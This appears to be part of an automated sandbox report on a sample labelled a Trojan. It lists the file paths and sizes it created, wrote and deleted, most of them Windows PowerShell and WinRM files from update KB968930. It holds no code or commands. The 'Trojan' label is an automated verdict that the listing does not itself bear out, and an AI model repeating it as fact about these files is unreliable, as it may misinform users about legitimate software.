C:\6c23dc75f57bb04ba83a51fb3e\about_types.ps1xml.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_special_characters.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrmprov.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\update.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_environment_variables.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_requirements.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_regular_expressions.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\update.ver (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.management.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_switch.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_properties.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_data_sections.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\spmsg.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pssessions.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_line_editing.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wtrinstaller.ico (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_throw.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_faq.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_automatic_variables.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsman.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmprovhost.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmpty.xsl (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\help.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\update.inf (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\filesystem.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.gpowershell.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_parameters.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pspluginwkr.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_reserved_words.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_prompts.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_advanced.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmwmipl.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_aliases.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_troubleshooting.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\updspapi.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_modules.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\dotnettypes.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmauto.mof (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.utility.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\windowsremoteshell.adm (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_join.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_providers.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pscustomsetuputil.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell_ise.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrmprov.mof (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\eventforwarding.adm (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\importallmodules.psd1 (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_objects.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.management.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_transactions.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\profile.ps1 (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\system.management.automation.dll-help.xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_language_keywords.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_session_configurations.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.security.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_path_syntax.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_scopes.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\windowspowershellhelp.chm (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_continue.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_eventlogs.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmres.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_variables.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmplpxy.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_history.help.txt (0 bytes)
The process ngen.exe:216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (484 bytes)
The process ngen.exe:2432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (744 bytes)
The process ngen.exe:1308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)
The process ngen.exe:2440 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1066 bytes)
The process ngen.exe:1904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (756 bytes)
The process ngen.exe:1712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1178 bytes)
The process ngen.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1442 bytes)
The process ngen.exe:1944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (746 bytes)
The process ngen.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1432 bytes)
The process ngen.exe:1560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (794 bytes)
The process ngen.exe:816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1150 bytes)
The process ngen.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1088 bytes)
The process ngen.exe:560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)
The process ngen.exe:2448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1388 bytes)
The process ngen.exe:2424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1446 bytes)
The process ngen.exe:1916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (706 bytes)
The process ngen.exe:1624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (776 bytes)
The process ngen.exe:4076 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)
The process ngen.exe:1240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1090 bytes)
The process ngen.exe:2000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)
The process ngen.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (864 bytes)
The process ngen.exe:1572 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (444 bytes)
The process ngen.exe:1380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)
The process update.exe:2296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10088 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5468 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5993 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (2838 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3604 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (138779 bytes)
%WinDir%\comsetup.log (47798 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (245245 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (23303 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
The Trojan deletes the following file(s):
%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
